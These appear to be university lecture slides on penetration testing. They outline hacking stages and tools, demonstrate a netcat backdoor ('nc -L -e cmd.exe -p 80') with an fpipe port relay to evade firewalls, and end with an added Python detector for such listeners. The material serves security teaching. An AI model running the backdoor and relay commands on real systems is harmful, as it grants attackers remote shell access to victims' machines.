8/14/2019 Penetrate Test
1/26
cs591 chow
C. Edward Chow
Penetrate Testing
Outline of The Talk
Definition, Concepts on Penetration Testing/Hacking
Anatomy of a Hack
Framework for penetration studies
Skills and Requirements of a Penetration Tester
SAN list of Security Holes
Internet Penetration
Dial up Penetration
Internal Penetration
References:
CORE IMPACT - Penetration Testing: Assessing Your Overall Security Before Attackers Do
Pages 165, 277, Security in Computing
Hack I.T.: Security Through Penetration Testing, by T.J. Klevinsky, Scott Laliberte, Ajay Gupta
http://www.hackingexposed.com/win2k/links.html
http://cs.uccs.edu/~cs591/sanPortalWhitePaperPT.pdf?licenseid=3007
Definition
Vulnerability (Security Flaw): a specific failure of the system to guard against unauthorized access or actions. It can be in procedures, technology (SW or HW), or management.
Using the failure of the system to violate the site security policy is called exploiting the vulnerability.
Penetration Study is a test for evaluating the strengths of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.
Penetration Testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.
Penetration Testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.
It is not a proof technique. It can never prove the absence of security flaws. It can only prove their presence.
Example goals of penetration studies are gaining read or write access to specific objects, files, or accounts; gaining specific privileges; and disruption or denial of the availability of objects.
What is the difference between penetration testing and hacking/intrusion?
More Thorough Penetration Study
A more thorough penetration study is to find the proper interpretation of the vulnerabilities found and to draw conclusions on the care taken in the design and implementation.
A simple list of vulnerabilities, although helpful in closing those specific holes, contributes far less to the security of a system.
In practice, constraints (resources, money, time) affect the penetration study.
Hacking Methodology (Steps)
An excellent description is inside the back cover page of the Hacking Exposed text by McClure et al.
Footprinting: whois, nslookup
Scanning: Nmap, fping
Enumeration: dumpACL, showmount, legion, rpcinfo
Gaining Access: Tcpdump, L0phtcrack, NAT
Escalating Privilege: John the Ripper, getadmin
Pilfering: Rhosts, user data, config files, registry
Covering Tracks: zap, rootkits
Creating Back Doors: Cron, at, startup folder, netcat, keystroke logger, remote desktop
Denial of Service: Synk4, ping of death, tfn/stacheldraht
Footprinting
Information gathering. Sam Spade is a Windows-based network query tool. Find out the target IP address/phone number range.
Why check phone numbers? Namespace acquisition. Network topology (VisualRoute). It is essential to a surgical attack. The key here is not to miss any details.
Note that for a penetration tester, this step is to avoid testing others instead of your client, and to include all systems to be tested (sometimes the organization will not tell you what their systems consist of).
Defense: deploy NIDS (snort), RotoRouter
Techniques and tools:
Open source search: Google, search engines, Edgar
Find domain name, admin, IP addresses: Whois (Network Solutions; arin)
Name servers, DNS zone transfer: Nslookup (ls -d), dig, Sam Spade
Links:
http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22ge.+com%22
http://www.sec.gov/cgi-bin/srch-edgar
http://www.networksolutions.com/cgi-bin/whois/whois?STRING=ibm.com&SearchType=do
http://ws.arin.net/cgi-bin/whois.pl?queryinput=128.198.0.0
http://cs.uccs.edu/~cs691/penetrateTest/toolresults.html
http://www.samspade.org/ssw/
Scanning
Bulk target assessment: which machines are up and what ports (services) are open.
Focus on the most promising avenues of entry.
To avoid being detected, these tools can reduce the frequency of packet sending and randomize the ports or IP addresses to be scanned in the sequence.
Note that some machines do not respond to ping but do respond to requests to ports that are actually open. Ardor is an example.
Techniques and tools:
Ping sweep: Fping, icmpenum, WS_Ping ProPack, nmap
TCP/UDP port scan: Nmap, Superscan, fscan
OS detection: Nmap, queso, siphon
Links:
http://www.fping.com/download/
http://cs.uccs.edu/~cs691/penetrateTest/toolresults.html
Enumeration
Identify valid user accounts or poorly protected resource shares.
More intrusive probing than the scanning step.
Techniques and tools:
List user accounts: Null sessions, DumpACL, Sid2user, onSiteAdmin
List file shares: Showmount, NAT, legion
Identify applications: Banner grabbing with telnet or netcat, rpcinfo
Links:
http://rng.r2.ru/download.htm
http://www.atstake.com/research/tools/network_utilities/
Gaining Access
Based on the information gathered so far, make an informed attempt to access the target.
Techniques and tools:
Password eavesdropping: Tcpdump/ssldump, L0phtcrack, readsmb
File share brute forcing: NAT, legion
Password file grab: Tftp, Pwdump2 (NT)
Buffer overflow: Ttdb, bind, IIS .HTR/ISM.DLL
Escalating Privilege
If only user-level access was obtained in the last step, seek to gain complete control of the system.
Techniques and tools:
Password cracking: John the Ripper, L0phtcrack
Known exploits: Lc_messages, Getadmin, sechole
Covering Tracks
Once total ownership of the target is secured, hiding this fact from system administrators becomes paramount, lest they quickly end the romp.
Techniques and tools:
Clear logs: Zap, Event Log GUI
Hide tools: Rootkits, file streaming
Creating Back Doors
Trap doors will be laid in various parts of the system to ensure that privileged access is easily regained whenever the intruder decides.
Techniques and tools:
Create rogue user accounts: Members of wheel, admin
Schedule batch jobs: Cron, AT
Infect startup files: rc, startup folder, registry keys
Plant remote control services: Netcat, remote.exe, VNC, BO2K, remote desktop
Install monitoring mechanisms: Keystroke loggers, add acct. to secadmin mail aliases
Replace apps with Trojans: Login, fpnwclnt.dll
Denial of Service
If an attacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.
Techniques and tools:
SYN flood: synk4
ICMP techniques: Ping of death, smurf
Identical src/dst SYN requests: Land, Latierra
Overlapping fragment/offset bugs
Out of bounds TCP options (OOB)
DDoS: Trinoo, TFN, stacheldraht
Links:
http://staff.washington.edu/dittrich/misc/trinoo.analysis
http://www.networkcomputing.com/1201/1201f1c1.html
http://www.anml.iu.edu/ddos/tools.html
Nessus: Integrated Security Scanning Tool
Originally designed by Renaud Deraison
Available at www.nessus.org
Main scanning engine running on a Unix server, with a client GUI running on Unix or Windows. Pretty good control and reporting.
Includes a scripting language for plug-ins (detecting additional attacks).
http://www.nessus.org/pres/bh2001/index.html
Setting up Backdoor Connection
Once the admin privilege is obtained, you install tools that allow you to run commands remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting messages (fpipe).
Port redirection accepts packets on one port and sends them out over another port. It can be used to get around a packet-filter firewall.
We will use netcat and fpipe to illustrate the concept.
Netcat is available at http://www.atstake.com/research/tools/network_utilities/
Fpipe is available at http://www.foundstone.com
Setup Netcat
C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63
The hacker runs the nc command on the victim machine, which listens for commands sent in on port 80, uses cmd.exe to run each command, and redirects the console output back as the HTTP response.
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
Here we bind in front of port 80. You can also use port 139. The idea is to use a known port to avoid detection.
-L is used to repeat the previous command after the connection is terminated.
The nc command will receive a command from a packet sent to port 80, run it with cmd.exe, and send back the execution result.
Setup FPIPE
C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63
This is run on the infected machine, which serves as the relay. It listens on port 53 for Internet connections and relays any message arriving on port 53 to the machine 128.198.177.63 on port 80.
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc. http://www.foundstone.com
Pipe connected:
In: 128.198.162.60:58797 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Pipe connected:
In: 128.198.162.60:58801 --> 128.198.168.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Here the fpipe program listens for packets coming in from blanca to port 53 and relays them to 128.198.177.63 from port 53 (DNS) to avoid detection.
Telnet to the relay host
[cs691@blanca cs691]$ telnet 128.198.168.63 53
Trying 128.198.168.63...
Connected to vivian (128.198.168.63).
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\work\cucs\cs522\project>dir
dir
 Volume in drive C is S3A1203D501
 Volume Serial Number is 503B-9F00

 Directory of C:\work\cucs\cs522\project

04/29/2003  12:56 PM                   .
04/29/2003  12:56 PM                   ..
04/29/2003  12:50 PM           371,208 erniestInfocom2000.ps
Note that it is the console output of the 128.198.177.63 machine that is being shown here.
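As an added defender-side example (not from the slides): a Python check that flags the two conditions the netcat/fpipe setup above relies on for stealth, a well-known port owned by an unexpected program (nc on 80) and a process that both listens and dials out to a service elsewhere (fpipe on 53 relaying to 128.198.177.63:80). The netstat rows, the PID-to-image map and the allow-list of expected port owners are constructed assumptions, not output from the slides' hosts.

```python
import re
from collections import defaultdict
# Assumed legitimate owners of well-known TCP ports on a Windows host (allow-list).
EXPECTED_OWNERS = {53: {"dns.exe"}, 80: {"inetinfo.exe", "w3wp.exe"}, 445: {"System"}}
# One `netstat -ano` TCP row: proto, local, foreign, state, PID (UDP rows lack State).
NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)\s+(\S+)\s+(\d+)\s*$")
# Constructed sample: nc.exe bound to port 80 (slide 23) and fpipe.exe listening on
# 53 while relaying to 128.198.177.63:80 (slide 24), shown on one host for brevity.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    128.198.177.63:80      0.0.0.0:0              LISTENING       1844
  TCP    128.198.168.63:53      0.0.0.0:0              LISTENING       2210
  TCP    128.198.168.63:53      128.198.162.60:58797   ESTABLISHED     2210
  TCP    128.198.168.63:53      128.198.177.63:80      ESTABLISHED     2210
"""
SAMPLE_PROCS = {4: "System", 1844: "nc.exe", 2210: "fpipe.exe"}  # constructed PID->image
def parse_netstat(text):
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            proto, laddr, lport, faddr, fport, state, pid = m.groups()
            rows.append({"proto": proto, "laddr": laddr, "lport": int(lport),
                         "faddr": faddr, "fport": fport, "state": state,
                         "pid": int(pid)})
    return rows
def find_suspicious(rows, procs):
    """Flag well-known ports owned by unexpected images and relay-shaped processes."""
    findings, by_pid = [], defaultdict(list)
    for r in rows:
        by_pid[r["pid"]].append(r)
    for pid, conns in by_pid.items():
        name = procs.get(pid, "?")
        listening = [c for c in conns if c["state"] == "LISTENING"]
        for c in listening:
            allowed = EXPECTED_OWNERS.get(c["lport"])
            if allowed is not None and name not in allowed:
                findings.append(("unexpected_listener", pid, name, c["lport"]))
        # Relay pattern: one process both accepts connections and dials out to a service
        # port. Classify by the *foreign* port: a redirector can pin its outbound source
        # port to the listening port (the slide's -s 53), so local ports look identical.
        outbound = [c for c in conns if c["state"] == "ESTABLISHED"
                    and c["fport"].isdigit() and int(c["fport"]) < 1024]
        if listening and outbound:
            for c in outbound:
                findings.append(("relay_pattern", pid, name,
                                 f"{c['laddr']}:{c['lport']}->{c['faddr']}:{c['fport']}"))
    return findings
```

The relay rule fires on connection shape alone, so it still flags the redirector when the image name has been renamed to something that the allow-list accepts.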
Layering of Tests
1. External attacker with no knowledge of the system.
2. External attacker with access to the system.
3. Internal attacker with access to the system.